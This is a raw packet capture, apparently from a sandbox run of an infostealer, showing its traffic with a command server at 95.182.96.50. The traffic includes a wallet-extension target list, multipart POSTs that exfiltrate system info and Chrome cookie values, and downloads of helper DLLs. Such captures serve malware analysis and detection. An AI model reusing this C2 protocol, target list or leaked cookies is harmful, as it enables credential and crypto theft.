TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 24, 2024 13:54:13.385010004 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 24, 2024 13:54:13.385045052 CEST	424	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 24, 2024 13:54:13.385080099 CEST	1236	IN	Data Raw: 61 6d 39 75 59 6d 5a 69 5a 32 46 76 59 33 77 78 66 44 42 38 4d 48 78 48 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 Data Ascii: am9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWl
Oct 24, 2024 13:54:13.385118008 CEST	1236	IN	Data Raw: 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 Data Ascii: Z2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV
Oct 24, 2024 13:54:13.385153055 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 Data Ascii: IFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWd
Oct 24, 2024 13:54:13.385190964 CEST	740	IN	Data Raw: 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57 6c 31 62 58 78 6a 61 57 39 71 62 32 4e 77 61 32 4e 73 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a 6e 77 78 66 44 Data Ascii: MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2V
Oct 24, 2024 13:54:13.387083054 CEST	467	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF Host: 95.182.96.50 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="message"fplugins------BGDBAKFCFHCGDGCBAAKF--
Oct 24, 2024 13:54:13.619102001 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 24, 2024 13:54:13.636066914 CEST	200	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEH Host: 95.182.96.50 Content-Length: 6679 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 13:54:13.636118889 CEST	6679	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 Data Ascii: ------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 24, 2024 13:54:13.957953930 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:14.201070070 CEST	91	OUT	GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1 Host: 95.182.96.50 Cache-Control: no-cache
Oct 24, 2024 13:54:14.430226088 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 24, 2024 13:54:14.430291891 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 24, 2024 13:54:14.430326939 CEST	424	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 24, 2024 13:54:16.957834005 CEST	950	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDAFIJJECFHJJKFCAKJ Host: 95.182.96.50 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------EHDAFIJJECFHJJKFCAKJ--
Oct 24, 2024 13:54:17.258574963 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:17.350600004 CEST	562	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH Host: 95.182.96.50 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="file"------BFCFBKKKFHCFHJKFIIEH--
Oct 24, 2024 13:54:17.615045071 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:18.302691936 CEST	562	OUT	POST /2aced82320799c96.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD Host: 95.182.96.50 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="file"------FCAAEBFHJJDAAKFIECGD--
Oct 24, 2024 13:54:18.560820103 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:54:19.036829948 CEST	91	OUT	GET /fee3b98529eb4b43/freebl3.dll HTTP/1.1 Host: 95.182.96.50 Cache-Control: no-cache
Oct 24, 2024 13:54:19.265535116 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:19 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 24, 2024 13:54:20.499931097 CEST	91	OUT	GET /fee3b98529eb4b43/mozglue.dll HTTP/1.1 Host: 95.182.96.50 Cache-Control: no-cache
Oct 24, 2024 13:54:20.730149031 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:20 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 24, 2024 13:54:21.366039991 CEST	92	OUT	GET /fee3b98529eb4b43/msvcp140.dll HTTP/1.1 Host: 95.182.96.50 Cache-Control: no-cache
Oct 24, 2024 13:54:21.594990969 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:54:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 